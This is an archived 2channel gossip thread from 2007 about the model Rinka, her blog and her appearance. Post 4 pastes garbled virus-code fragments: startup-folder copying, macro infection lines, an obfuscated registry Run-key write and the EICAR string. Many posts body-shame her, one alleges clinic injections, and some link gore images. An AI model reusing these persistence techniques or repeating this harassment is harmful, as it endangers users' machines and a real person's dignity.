2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

梨花〜rinka part2

1 :無名モデル:2007/11/01(木) 14:17:11 ID:???
引き続き梨花ちゃんについて語りましょう!

1973年5月21日生 東京都出身 O型

RinkaのHappy Life
http://www.smooche.jp/rinka/


2 :無名モデル:2007/11/01(木) 16:54:08 ID:ECnPzC4r
ブログの更新しなくなったの2ちゃんが原因なんだからやめよーよ。

3 :無名モデル:2007/11/01(木) 17:12:17 ID:???
>>2
どこに2ちゃんのせいだって書いてあるの?
2ちゃんにスレ出来るだけ感謝だろ



4 :無名モデル:2007/11/01(木) 17:31:31 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :無名モデル:2007/11/01(木) 18:22:57 ID:???
2ちゃんねるが原因じゃなくて、失恋シタのが原因だろ

6 :無名モデル:2007/11/03(土) 08:42:36 ID:wbdmoZ42
すみせん、昨日のハニカミで梨花さんが着てたコート、どこのブランドかわかる方いませんか?
すごいかわいかったんで昨日から調べてるんですけどわかんないんです(T-T)

7 :無名モデル:2007/11/03(土) 09:08:15 ID:???
売れっ子モデルが2ちゃんなんか見てないってwww

8 :無名モデル:2007/11/03(土) 09:33:34 ID:???
ヤリマンが見る訳ねーだろ

9 :無名モデル:2007/11/03(土) 14:51:18 ID:???
>>6
NINEのだょハニカミ見た可愛いかったねーー
恋愛トークだったけど…別れる前の収録かなぁ

10 :無名モデル:2007/11/03(土) 20:26:31 ID:???
ひゃんってなんなん?ちーとの中はご心配なくって。
ブログが一位らしいけど、ランキングに並んでるブログもたいしたことないのばっか。
みんなが見るのも梨花とかモデルのおかげじゃん。
もーすんごくつまんないひゃんのブログ。
ファッションもなんだか痛いおばさんだし。
今日のOPはアメアパだとかデニムはcherだとかばっぐはbalenciagaとか知らねーっつーの
聞いてる音楽も趣味悪いし、愛読書が漫画って、勘弁してよって感じ。
どんでネタがないもんだから、ひとんちの子供の顔写真載せちゃうわでひどいのなんのって。
梨花のブログを見たいよー


11 :無名モデル:2007/11/03(土) 20:29:09 ID:x7ETEF//
やっとできたのね。梨花のスレ。

12 :無名モデル:2007/11/03(土) 22:33:00 ID:???
>>10
ひゃんスレでどうぞ!

13 :無名モデル:2007/11/03(土) 23:08:21 ID:???
ひゃんスレなんてないじゃん。

14 :無名モデル:2007/11/03(土) 23:34:22 ID:XQALLgPW
隣家「食べて、寝て、エッチして」
発言3回
しずちゃんが「隣家さんと一緒だよ」

ナイスツッコミwww

15 :無名モデル:2007/11/03(土) 23:35:53 ID:+tx65GJt
実況すなカス

16 :無名モデル:2007/11/04(日) 00:21:40 ID:???
>>13
http://ex23.2ch.net/test/read.cgi/net/1188139806/
どうぞ

17 :無名モデル:2007/11/04(日) 01:28:55 ID:???
    |\__/|
  /      ヽ
  | (●) (●)  | しょっこしょこ♪ 
  |三(_文_)三  |
  \_ ^ __/
♪  / ⊂ ) )) ♪
( ⊂(( ヽつ 〈
   (_)^ヽ__)
    |\__/|
  /▼▼▼ ヽ
  | (●) (●)  | しょっこしょこ♪ 
  |三(_又_)三  |
  \_ ^ __/
♪  / ⊂ ) )) ♪
( ⊂(( ヽつ 〈
   (_)^ヽ__)


18 :無名モデル:2007/11/04(日) 03:18:46 ID:QJ9CbnDX
けっこうかわいい!!

19 :無名モデル:2007/11/04(日) 19:15:50 ID:???
いっつも流行取り入れすぎでうざい

20 :無名モデル:2007/11/04(日) 19:17:44 ID:???
http://imepita.jp/20071104/634260

21 :無名モデル:2007/11/04(日) 20:45:01 ID:0svYgn+B
梨花ちゃん、元気してるのかな・・・心配です。どうしてるか知ってる人います??

22 :無名モデル:2007/11/05(月) 02:10:04 ID:???
>>20
グロだよ 見ないほうがいい

23 :無名モデル:2007/11/05(月) 14:20:00 ID:fpdQifYS
age

ブログ更新したよー!

24 :無名モデル:2007/11/05(月) 14:20:39 ID:fpdQifYS
age

ブログ更新したよー!

25 :無名モデル:2007/11/05(月) 14:36:18 ID:9IsUfdY5
ひゃんっていいヤツじゃん!

26 :無名モデル:2007/11/05(月) 16:16:52 ID:km6eqFDQ
やっと更新された〜!!嬉しい☆本当ヒャンのことは
ヒャンのスレに行ってくれ!!ここは梨花なんだからさ。

27 :無名モデル:2007/11/05(月) 19:39:40 ID:1vBcTe+B
age

ブログ更新したよー!

28 :ノーブランドさん:2007/11/05(月) 19:46:39 ID:???
>>13
よく言い切ったよねw

29 :無名モデル:2007/11/05(月) 22:41:15 ID:nIuvK3Tt
ひゃんって誰?
あと、&aって何?

30 :無名モデル:2007/11/05(月) 23:08:24 ID:???
ひゃんはどうでもいい。
なんでひゃんのブログが読まれるのか不思議。
あっ、梨花とか美和のおかげか。

31 :無名モデル:2007/11/05(月) 23:37:37 ID:???
ほんと、ひゃんなんてどうでもいい。
普通の人じゃん。

32 :無名モデル:2007/11/07(水) 15:32:50 ID:???
なぜRSSリーダーには出なかったんだ…

33 :無名モデル:2007/11/08(木) 02:35:47 ID:???
10月8日温泉に行ったの…
たしかにひゃんのblogにも詳細はないが東京から少し離れたとあるな…

34 :無名モデル:2007/11/08(木) 03:06:19 ID:???
>>30
確かに梨花つながりでひゃんblog見てる人多いと思うけど、ひゃんのblog見てて楽しい。
梨花も綺麗でおしゃれだけど、ひゃんは何系って偏ってなくて古着とか混ぜたり自分なりのおしゃれだからすごく憧れる。

まっ、二人とも可愛い!

35 :無名モデル:2007/11/08(木) 21:58:01 ID:???
>>34
そうかぁ〜?
やっぱ梨花はニット帽かぶっても現役芸能人だしあのキャラだから無理ないけど、
ひゃんってもうあのニット帽あり得ない。
がんばってる感じが思いっきりイタおばファッション。
でも梨花のネタがあるかもしれないからチェックしちゃうんだけどね。

36 :無名モデル:2007/11/09(金) 12:23:41 ID:???
ひゃんはニット帽が似合わないとかじゃなくて
あの帽子自体がマズい。

37 :無名モデル:2007/11/09(金) 13:05:55 ID:KUFPpgTj
ひゃんのスレにいってくれ。

38 :無名モデル:2007/11/09(金) 13:16:17 ID:/2L+2b2X
ブログうp

39 :無名モデル:2007/11/09(金) 13:31:45 ID:???
ひゃん可愛いって言う人は自分が余程不細工??なの???
梨花は凄く可愛いけど、ひゃんなんて一般人で普通じゃん・・・。

40 :無名モデル:2007/11/09(金) 14:02:19 ID:???
>>39
ひゃんは一般人で普通で、梨花はすごくかわいいと思うあんたは
さぞかし美しいお顔立ちなんでしょうねw

梨花、ハワイに失恋旅行っすか..

41 :無名モデル:2007/11/09(金) 14:36:48 ID:???
ハワイ画像きれいだねぇ

42 :無名モデル:2007/11/09(金) 15:19:57 ID:C9LHHMrW
>>40
えっ?ひゃん綺麗ではないよね?(笑)

43 :無名モデル:2007/11/09(金) 15:37:31 ID:???
>>42
は?ゴメン、意味わかんないww

44 :無名モデル:2007/11/09(金) 16:00:28 ID:vc4dMMoZ
ハワイのきれ〜
すごい絵になってる

45 :無名モデル:2007/11/09(金) 17:41:01 ID:???
きっとたくさんのパワーをもらって帰ってきてくれるね
頑張れ梨花

46 :無名モデル:2007/11/09(金) 21:43:08 ID:???
>>39,>>40,>>42,>>43
君らバカはどっかよそでやってくれ。
梨花はいい大人のくせにプロ意識が足りないと思う。
ひゃんはいい大人のくせにセンスがマズいと思う。
二人の共通点はファッションと恋愛だけに必死な事。
そして中身はガキでアホ。


47 :無名モデル:2007/11/09(金) 22:29:54 ID:???
>>46
そして君もアホ

48 :無名モデル:2007/11/11(日) 00:35:53 ID:???
このスレ伸びないねー
ひゃんスレの方が賑わってる..

49 :無名モデル:2007/11/11(日) 01:17:47 ID:???
梨花の、ボブアレンジに帽子、かわいい。
今週の弾丸は目元の化粧濃かったね。

50 :無名モデル:2007/11/11(日) 07:12:43 ID:???
ひゃんスレは実質おにぎりだし・・・
っていうか梨花もうblogあきたみたいだ。
ここはblog大賞でも取らせたいところだな

51 :無名モデル:2007/11/12(月) 01:29:33 ID:???
こいつもう痛々しすぎる。
老化をお笑いセンスで誤魔化すのもそろそろ限界だろ。
飯島のように引退しろ。

52 :無名モデル:2007/11/13(火) 03:40:27 ID:???
更新された。日本時間11日早朝はまだハワイか…
ひゃんはいつソファーもらったんだろう。

53 :無名モデル:2007/11/13(火) 10:12:47 ID:1hjkYH71
ブログうpうpうp

54 :無名モデル:2007/11/14(水) 09:57:33 ID:???
ほんとうの梨花好きは
ひゃんをバカにしたりしないな!
梨花とひゃんは切っても切れない仲

55 :無名モデル:2007/11/14(水) 13:34:45 ID:???
ひゃん好きの女の子いっぱいいるよ?
>>10 の発言とか、男性の発言にしか思えないんだけど。。。
毎回「服はどこの?」って質問が来てるんだろうから、
聞く前に答えてくれるなんて親切だよね。
嫉妬って怖いww

56 :無名モデル:2007/11/14(水) 16:41:47 ID:???
メキシコの写真もハワイの写真も綺麗だね〜。
胸の位置が気になるけどw

57 :無名モデル:2007/11/14(水) 17:03:14 ID:???
ttp://www.smooche.jp/rinka/archives/2007/11/images/s1197018127.jpg

梨花 胸垂れ過ぎでしょwww

58 :無名モデル:2007/11/14(水) 21:01:05 ID:???
メキシコのピンクのキャミ着てるのってパンツの線くっきりでてる。
まさか水着じゃないよね。
かわいいけど。

59 :無名モデル:2007/11/14(水) 21:48:08 ID:???
>>55
ふぁんがいっぱいいるったって、知られるようになったのって
梨花とか美和とかのブログに出て来たからでしょ?
私は女だけど、ひゃんのコーデは好きじゃない。
30にもなってあんな格好はしたくないよ。
なんか発言も行動も趣味も子供っぽいし。
梨花の方が断然参考になるし、コーデは真似できない事もあるけど
見てて楽しい。

60 :無名モデル:2007/11/14(水) 23:10:23 ID:???
私も、ブログ開いてびびった。乳垂れに。
よく載せてくれたね。自分では馴染みすぎてわかんないのかね。

61 :無名モデル:2007/11/15(木) 09:36:55 ID:???
>>60
わかっちゃいるけどもう開き直ってるんだろうね。
整形しないのかな。

62 :無名モデル:2007/11/15(木) 11:43:20 ID:???
梨花に整形胸は似合わない気がする。
叶姉妹みたいな胸の梨花は想像できんw
そばかすあっても垂れ乳でも、それが梨花の良さと思う。
普通の日本人が30過ぎてあの格好だときもいだけだけど、梨花は
キュートに見えるから凄いと思う。

63 :無名モデル:2007/11/15(木) 14:16:38 ID:GfPmwoYf
↑同感

64 :無名モデル:2007/11/15(木) 14:24:53 ID:sxNndisy
キュートねぇ。
理解できないわ。
Sweetの指くわえ写真見て吐き気した。

65 :無名モデル:2007/11/15(木) 14:26:40 ID:NO24DAvl
>>63

じゃあ吐け

66 :無名モデル:2007/11/15(木) 14:27:46 ID:NO24DAvl
>>64

67 :無名モデル:2007/11/15(木) 17:23:42 ID:sxNndisy
吐けってwwwお馬鹿だね。

68 :無名モデル:2007/11/15(木) 17:35:54 ID:???
凄い垂乳
なのにあの服装・・
場末のスナックのママみたい
不潔なイメージ
自分をよく分かってない年増のばばぁってゴミと一緒の様なもん

69 :無名モデル:2007/11/15(木) 19:54:49 ID:???
日本人女性だと場末のスナックママみたいで品がなくて
汚くみえるかもしれないけど、
この梨花に関してはやっぱ白人の血が混じってるからか、
こういうカジュアルも似合っちゃってるとこがさすがと思った。
海外に行くとおばさんでも白人が平気でカジュアルな格好してるけど、
まさにそんな感じ。
日本のおばさんがやると絵になんないんだけどね。

70 :無名モデル:2007/11/15(木) 20:05:42 ID:???
年増の立ちんぼにしか見えませんが。

71 ::2007/11/15(木) 23:52:43 ID:/t/F/tAm
アタシはひゃんも梨花も好きだな!
確か二人はご近所さんどこ住んでんだろな?

72 :無名モデル:2007/11/16(金) 00:33:32 ID:???
>>71
フィリピン人?

73 :無名モデル:2007/11/16(金) 02:47:09 ID:???
って言うか、ひゃんの事嫌ならブログ見なきゃいいのにww
見ちゃってる時点でひゃんがwin !


74 :無名モデル:2007/11/16(金) 02:53:08 ID:???
うんこみていな顔。
ひとみ婆さん乳がまじキモイ。

75 :無名モデル:2007/11/16(金) 03:12:33 ID:???
>>73
ヒャンの話は止まってんじゃん。流れ読め。

76 :無名モデル:2007/11/16(金) 03:20:35 ID:???
>>74
おまいも十分垂れ乳じゃん
わかんないと思って人の事言っちゃだめだろ
だから梨花には勝てないんだって
僻むな僻むな

77 :無名モデル:2007/11/16(金) 03:25:06 ID:???
ひゃん叩き止まってるのに何でわざわざ蒸し返すんだろうね。
元々スレ違いだし、スレが荒れるだけなのに。

78 :無名モデル:2007/11/16(金) 07:48:15 ID:???
http://vileking.com/photos/maggots_brain2.jpg

79 :無名モデル:2007/11/16(金) 14:47:50 ID:???
>>77
同意。ひゃんなんって2ちゃんで叩かれるほどのもんじゃない。
専用スレがあるなんて驚き。


80 :無名モデル:2007/11/16(金) 21:29:35 ID:7yCvwsKC
AUBEのCMが激しくキモイ
その上ドリカム、胸焼けがする…

81 :無名モデル:2007/11/16(金) 21:30:16 ID:???
AUBEのCMすっごく可愛いじゃん!!

82 :無名モデル:2007/11/16(金) 21:40:08 ID:???
ほんとすごい可愛いよ

83 :無名モデル:2007/11/16(金) 22:09:18 ID:???
垂れ乳とかそばかすとか法令線婆とか色々言われてるけど、
そんな自然なまんまなとこも親しみやすくていい!安易に整形に走ってなくていい!
やっぱり顔は最高に可愛いと思う!


84 :無名モデル:2007/11/16(金) 22:31:12 ID:???
からだ鍛えてるから引き締まってるしカッコイイよね
何でも金に任せて若作りしている某モデルとは大違い!

85 :無名モデル:2007/11/16(金) 23:20:07 ID:CNhz1oPT
法令線自体は、20代前半でもくっきり出ている人いるからねぇ。
おばさん体型も20代で多いよ。姿勢は悪いし、スタイル悪いし、むくんでたり太ってたり。
梨花はそんな子達よりもずっと若々しいのに。

86 :無名モデル:2007/11/17(土) 00:15:31 ID:zlJjtQIu
りんかって胸整形じゃないの?数年前のハワイブックでの写真、全く乳なかったよ。

87 :無名モデル:2007/11/17(土) 01:48:18 ID:RYrgT9wA
好きなんだけど、清潔感がない。汚いイメージなんだよどうしても。

88 :無名モデル:2007/11/17(土) 01:59:27 ID:???
確かに昔はめちゃめちゃかわいかったけど、今は雑誌とテレビの差が激しすぎるんだよね
雑誌はどれもかわいいのになあ

89 :無名モデル:2007/11/17(土) 01:59:34 ID:???
あのー、梨花さんは高見皮膚科でヒアルロン酸とボトックスを頻繁に打ちに来られますよ。

90 :無名モデル:2007/11/17(土) 08:14:33 ID:???
打ってあの程度なの。
じゃあ打たなかったらって考えるととても恐ろしい・・・

91 :無名モデル:2007/11/17(土) 12:53:33 ID:???
>>89
だから何?

HRさん精神科行ったら

92 :無名モデル:2007/11/17(土) 13:18:41 ID:???
>>89





名前:無名モデル[???] 投稿日:2007/08/16(木) 21:06:45 ID:???
演技下手過ぎ、やめろ。
創価学会パワーを使ってTBSばかり出るのやめれ。
高見皮膚科に通ってボットックスやヒアルロン注射打ちに通ってんだ

93 :無名モデル:2007/11/17(土) 14:28:44 ID:???
凄い垂乳にびっくり

94 :無名モデル:2007/11/17(土) 17:53:51 ID:???
でも梨花はクォーターのせいか、垂れ乳ノーブラも絵になってないか?
これを日本人モデルがやっても絵にもならないと思うんだが。

95 :無名モデル:2007/11/17(土) 18:05:01 ID:???
うんおかしくない。金髪パサパサもなぜか違和感ないし
ヒアルやボト打つのも別にいいと思うよ
芸能人だしね。それにしても上に病院名まで書いてあったけど
随分意地悪な人だね。


96 :無名モデル:2007/11/17(土) 18:35:05 ID:???
梨香は肌に艶がなくても髪ボサボサでも絵になるね。
綺麗とか可愛いとかはまた違うんだけど好きだなぁ。

97 :無名モデル:2007/11/17(土) 18:44:44 ID:???
垂れ乳が絵になってるかは激しく疑問だけどw
ボサボサ髪しわくちゃそばかす肌はすっごくいいと思う。
ttp://www.smooche.jp/rinka/archives/2007/11/images/s1258269744.jpg

梨花の脚はエロくていいな〜

98 :無名モデル:2007/11/17(土) 18:53:15 ID:???
足首キュッとしてて筋肉質でほんとカッコイイ脚だね


99 :無名モデル:2007/11/17(土) 21:46:26 ID:???
ボサボサバサバサシワシワなのに可愛いってすごくね?
梨花最強!

100 :無名モデル:2007/11/18(日) 00:19:32 ID:???
月    席替え       ヒソヒソ・・・     「え?まだ居たの?」    ククンカクンカクンカッカー
曜     グループ学習   歌えないカラオケ    しょっこしょこ    VIPPER煽ればいいんですよ
の   調理実習                 体   「あれ?今日呼んだっけ?」
朝             修学旅行   怨み 育         休     チビデブ     エセヲタ
 コソコソ・・・            罰ゲーム告白           み  「調子乗ってんじゃねーよ」
        「なんで中川もくんの?」       図       時間
                              書  /  ̄`Y  ̄ ヽ          ト「えーと、誰?」
  二人組み       好きだったあの人    室 /  /       ヽ ザワ・・・   イ   鬱
     寝たふり    「オタクはきもいな・・・」   ,i / // / i   i l ヽ  落     レ     キモヲタ
漫画が友達  「中川さんコンビニ行って来てよW」|  // / l | | | | ト、 |  書            パクリ
                                | || i/  ノ ヽ、 | |  き
   画鋲   机に花   キモイ・・・           (S|| |  o゚⌒  ⌒゚o |    隠されたマンガ   
ザワザワ・・・・     ガヤガヤ・・・             | || |     .ノ  )| 「なにアイツ?」   
         アドレス帳                | || |ヽ、_ 〜'_/| |            セックス


101 :無名モデル:2007/11/18(日) 00:27:09 ID:???
新曲、MARIAかあ〜
hitomiにそのタイトルのあったね。

102 :無名モデル:2007/11/18(日) 13:13:47 ID:dGg8sgUY
この人、ブリジットバルドーにみえるときがある
ボサボサ頭も似合うし

103 :無名モデル:2007/11/18(日) 14:40:54 ID:???
似てるって、30過ぎてからの劣化が凄まじいところが?

104 :無名モデル:2007/11/18(日) 16:56:23 ID:???
ブログいい感じ。
絵になるよね〜。

105 :無名モデル:2007/11/18(日) 18:32:21 ID:qsQVrnMO
この人、ダイアンキートンにみえるときがある
ボサボサ頭も似合うし


106 :無名モデル:2007/11/18(日) 18:44:12 ID:???
劣化が凄まじいから?

107 :無名モデル:2007/11/18(日) 21:04:00 ID:???
梨花好きなんだけど、AUBEはちょっと修正しすぎじゃない?w
肌がぜーんぜん違う。修正しすぎの広告で吃驚したのはエリザベス・アーデンの
キャサリン・ゼタジョーンズのも凄かった。普段はおばさんっぽいのが広告では
まるで20代前半みたいなので最初誰だかわからんかった。
梨花修正もそのレベル。
肌修正しなくても可愛いんだから化粧品会社はあまり造り過ぎてほしくないよ。

108 :無名モデル:2007/11/19(月) 00:32:15 ID:???
>>107
しょうがないよ。AUBEは20代ターゲットだから。

109 :無名モデル:2007/11/19(月) 01:34:30 ID:???

みなさんにふさわしいスレがあります。
一度覗いて、カキコしてみてください。

モデル試練スレ
http://same.u.la/test/r.so/academy6.2ch.net/art/1194876759/



110 :無名モデル:2007/11/19(月) 16:43:47 ID:x+Fn3Wow
そばかすと笑いジワひどい
おばあちゃんみたい

111 :無名モデル:2007/11/19(月) 16:52:38 ID:???
お前がなー

112 :無名モデル:2007/11/19(月) 18:47:27 ID:lPVte1/x
夕日バックのセミヌードな後ろ姿。
後ろ姿は素敵。

113 :無名モデル:2007/11/19(月) 20:48:39 ID:???
メキシコの写真で胸の位置がおばあちゃんみたいなのが一枚あった!
かなり衝撃…

まぁなんだかんだ美人だと思うよ

114 :無名モデル:2007/11/19(月) 22:47:20 ID:???
梨花可愛すぎるお

115 :無名モデル:2007/11/19(月) 23:03:34 ID:???
去年の年末のいいともスペシャルで、梨花のAUBEのCM明けで、
梨花も居るとこでタモリたちが「今の誰だよw」って言ってたな。
そばかすは皆無になってるし、その他諸々修正しまくりだもんね。

最近の雑誌では、指くわえてんの多くない?
キツイわあ。

116 :無名モデル:2007/11/20(火) 01:29:24 ID:???
キツくないと編集が判断したんでしょ。

117 :無名モデル:2007/11/20(火) 03:20:16 ID:4gIae63a
俺小6の時しょっちゅう梨花で抜いてたな
今から10年くらい前
あの頃は若くて肌もモチモチで、オッパイも柔らかそうなんだけどパンパンのツンツンで凄いエロくてさ
まさに白人の乳
胸をこれでもか!って強調するようなミニTとか着てオッパイ揺らしてバラエティーにバンバン出てたよな
今の梨花もエロいけど、あの頃のエロさはハンパなかった


118 :無名モデル:2007/11/20(火) 09:06:52 ID:???
梨花って10年前から既に乾燥肌だったよね。
歯茎をキッと見せて顔をくしゃくしゃにして笑ってかわいかった。

119 :無名モデル:2007/11/20(火) 11:10:54 ID:4gIae63a
>>118
乾燥の度合いが20代と30代じゃ全然違うぜ

120 :無名モデル:2007/11/20(火) 14:14:23 ID:bQufU/DW
ちち垂れ写真消されたみたい。あーゆーナチュラルでキニシナイのが魅力なのに。

121 :無名モデル:2007/11/20(火) 14:16:15 ID:zc7/JjBZ
そこら辺の30代に比べれば、ありえないくらい可愛い

122 :無名モデル:2007/11/20(火) 14:44:31 ID:IFpH0FLk
どうでもいいです

123 :無名モデル:2007/11/20(火) 15:07:59 ID:???
口は閉じておきましょう

124 :無名モデル:2007/11/20(火) 16:40:01 ID:???
>>120
これ?
ttp://www.smooche.jp/rinka/archives/2007/11/images/s1197018127.jpg

125 :無名モデル:2007/11/20(火) 20:19:53 ID:4gIae63a
>>124
ッアー!!!!!

126 :無名モデル:2007/11/21(水) 19:04:11 ID:???
梨花34歳なのにあの雰囲気は神レベルに可愛いと思う。
同年代の日本人モデルであんな可愛い人いないよね。
梨花なら若作りファッションも絵になるから許せる。

127 :無名モデル:2007/11/21(水) 19:16:17 ID:???
ほんとだ、垂れ乳写真なくなってる。
ここチェックしてんのかなw

128 :無名モデル:2007/11/21(水) 21:20:48 ID:???
垂れ乳写真って11月14日の?
ふつうにあるんだけど・・

129 :無名モデル:2007/11/22(木) 02:55:50 ID:???
ブログの写真可愛い
この前話さなければ可愛いのにね〜って梨花の広告見てしゃべってる人見た

130 :無名モデル:2007/11/22(木) 16:58:04 ID:???
>>127
>>124にあるけど?
3コ前のレスも読めないの?


131 :無名モデル:2007/11/22(木) 20:53:43 ID:???
梨花元気になったみたいだね。よかったね〜。
今後もポジティブにがんばってほしい。

132 :無名モデル:2007/11/22(木) 21:01:31 ID:???
おすす目ねぇ・・・。

133 :無名モデル:2007/11/22(木) 21:16:37 ID:???
アホが語りいれるのってほんっとうざいわ。

134 :無名モデル:2007/11/23(金) 04:55:26 ID:???
MARIAってピュレグミとは違う曲なの?

135 :無名モデル:2007/11/23(金) 09:21:08 ID:???
相変わらず、語り出すとアホ丸出しだね。
事務所が訂正してあげてからアップすればいいのに。

136 :無名モデル:2007/11/23(金) 09:30:04 ID:???
梨花はそのまんまのアホでいい。アホなのに取り繕って知性派きどって墓穴掘ってる
奴よりずっといい。
ボサボサもしわしわも垂れ乳もアホも
隠さずそのまんまの梨花がいい!

137 :無名モデル:2007/11/23(金) 14:00:24 ID:???
あほなのに悩んでるの晒して語るのがイタい。
もっとはじければアホも個性になるが.....

138 :無名モデル:2007/11/23(金) 18:30:34 ID:???
今日はセレブ会らしい

139 :無名モデル:2007/11/24(土) 00:59:38 ID:???
たくさん写真アップしてくれるとうれしい。
梨花もシェルのエコバッグ使ってるね。

140 :無名モデル:2007/11/24(土) 06:29:15 ID:AZAGCxBP
梨花、顔やつれてるな。
でもさすが、短パンになま足でもヒャンと違って太ももしまってるし
現役芸能人だからか様になってるな。
ヴェロニクのブーツもかわいい。

141 :無名モデル:2007/11/24(土) 10:59:03 ID:???
今日は同志社女子大の学祭でのトークショー。生の梨花楽しみ。細いんだろうな。


142 :無名モデル:2007/11/24(土) 13:09:29 ID:???
梨花のトークショー?超うらやましい!
ファッションとか印象とかあとで教えてほしい。

143 :無名モデル:2007/11/24(土) 17:47:06 ID:???
昨晩はサレブ会だったらしいが・・・
4人ともそのことには触れずか・・・チィ

144 :無名モデル:2007/11/24(土) 22:05:42 ID:0LlBE04t
新曲「MARIA」は韓国映画の日本版主題歌。で、ピュレグミは「smile」ってタイトル。両A面だけど「MARIA」がメインなんじゃないかな?アイドルちっくな声だねぇ♪

145 :無名モデル:2007/11/24(土) 22:18:35 ID:0LlBE04t
今日、学祭のトークショー行ったよ。前見た時より少し顔がふっくらしてた。ってかシワがなくなってた。化粧品CMやってるし何かシワとりかプチ整形したかもね。張りが全然違う。あと大学生と若さ変わらないよ。凄いよ〜可愛い。あと意外と小柄。

146 :無名モデル:2007/11/24(土) 22:38:41 ID:???
レポサンクス
へ〜、顔ちょっとふっくらしたのか。ちょいふっくら位がいいよね
梨花、実際生だと若いよね。165あるように見えないし。

147 :無名モデル:2007/11/25(日) 00:21:02 ID:???
学祭いいな。うちの大学にも来てほしかった・・・。

>ユーフョーキャッチャー
梨花、これに限らず相変わらずの誤字だね。

148 :無名モデル:2007/11/25(日) 07:01:45 ID:???
なんでこう子供趣味の大人が増えちゃったんだろうね。
ぬいぐるみキャラクター好きなのは勝手だけど
隠れて愛好すればよろしいのにわざわざブログでアホを晒すなよ。
34才梨花の表情きんも〜

149 :無名モデル:2007/11/25(日) 08:16:33 ID:???
>>148
私もこの写真はさすがにちょっときもかったw
見た目若くしている事はいいけど、でも実際年齢は34の大人の女なんだから
勘違いして10代のアイドルのポーズみたいなことやらんでほしい。
まじきもすぎる。
しかしこの表情ってひゃんっぽいね。やっぱ類友なのかな。
ほんとに年取って若くいつづけること=幼さを演じることって勘違いしてる大人
多いよね。
それとも芸能人がただ単に頭悪いだけなのかな。

150 :無名モデル:2007/11/25(日) 19:35:19 ID:???
あのウサギって大塚愛のデザインって知ってるのかな?


151 :無名モデル:2007/11/25(日) 19:48:44 ID:???
ひゃんさんのぼったくり商売うざい。誰買うねんあれ。
もし梨花が宣伝でつけてますアピールすればヲタが買うんだろうけど。

152 :無名モデル:2007/11/25(日) 20:17:54 ID:???
乳たれ写真削除されてないじゃん。

153 :無名モデル:2007/11/25(日) 20:24:02 ID:???
クラスキーって高いよね
梨花も使ってるよ


154 :無名モデル:2007/11/26(月) 02:13:20 ID:???
乳垂れはバレてるからもういいんじゃない?グラドルとかじゃないし。
それより重要なのはモデルとしてはやっぱ脚線美だろうね。
ほんとあのスタイル羨ましいわ。
私は若いだけでスタイルいいわけじゃないから、
34になってもあんなに綺麗じゃないだろうし可愛い服も着れないんだろうなと思うと、
年取るのがほんとに嫌になるよ…。

やっぱもって生まれた美貌っていいなあ。

155 :無名モデル:2007/11/26(月) 16:29:49 ID:???
てかうさ子の写真はひゃんがよくやる表情だよねw

156 :無名モデル:2007/11/26(月) 22:06:43 ID:???
聞こえ悪いけど、事実ひゃんって梨花や美和さん他利用して商売してるけど
石にしろストラップにしろぼったくりすぎ。がめついのやっぱ・・・

157 :無名モデル:2007/11/27(火) 14:03:01 ID:???
梨花のblog行ったらいきなり新曲のスポットが流れた…
迷惑だ。

158 :無名モデル:2007/11/28(水) 01:02:46 ID:L3zD09YA
今の34歳って若いしきれいだよ。20代の時よりもきれいになっちゃってたりするし。
そうじゃない人が逆に老け過ぎてるって感じで見てるけど。
努力を怠ったか、素が不細工だったのか、生活が充実できるような金銭的・精神的余裕がないのか・・・。
地域にもよるのかな。

159 :無名モデル:2007/11/28(水) 10:33:02 ID:???
梨花みたいなスタイルのいい一般日本人女性なんてそんなに見ないよ。
梨花は特別綺麗と思う。

160 :無名モデル:2007/11/28(水) 12:54:29 ID:???
そうそう。梨花みたいなスタイルの
いい人自体まず日本人には少ないし。

161 :無名モデル:2007/11/28(水) 13:57:08 ID:???
CD発売になるね。
梨花はピュレグミのCM曲みたいなのが合ってると思う。
1stの曲も今回のMARIAもあまり雰囲気に合ってないような気がするなー…
ファンも可愛い雰囲気の梨花が好きって人が多いと思うんだけど。
歌に関しては方向性をもっと考えた方がいいと思っちゃったよ。梨花好きだからなおさらね。
そしたら売れるような気がする。

162 :無名モデル:2007/11/28(水) 19:59:11 ID:???
頼むからblog入った瞬間スポット流れるのはやめてくれ。
ビックリするから

163 :無名モデル:2007/11/28(水) 22:25:40 ID:ReW4SuR2
>159

まぁ、梨花の見た目はどっちかっていうと外人。
日本人の憧れる目鼻立ちではありますな(乾燥肌だけど)。
シエナ・ミラーによく似てる。
てか、外人にはありがちな顔。

164 :無名モデル:2007/11/30(金) 09:26:52 ID:???
ありがちな外人顔だけど日本人の中にいるとありがちじゃないから得だよね。
梨花人気は日本であるから成り立っているんだと思うよ。


165 :無名モデル:2007/11/30(金) 10:17:41 ID:???
そうそう最近特にハーフ系が流行ってるからさ・・・・
アナウンサーとかも。

166 :無名モデル:2007/11/30(金) 12:13:03 ID:???
ハーフ系ってだけでいけてないのまでタレントやってるよね。
モナとかババくさくてちっともいけてない。
そんなのに比べると梨花はありがちな外人顔だけど可愛いよね。

167 :無名モデル:2007/11/30(金) 12:38:46 ID:???
モナは顔よりも知性が立つタレントだと思うけど。
というかモナも十分キレイじゃね?
梨花みたいにCG加工してなくても直視できる。

168 :無名モデル:2007/11/30(金) 16:31:30 ID:???
モナは肌質がおぎやはぎのおぎ と杉田かおるみたい

169 :無名モデル:2007/11/30(金) 17:20:51 ID:v7SWpYN6
>>167
ハイビジョンでみなければ良かった芸能人
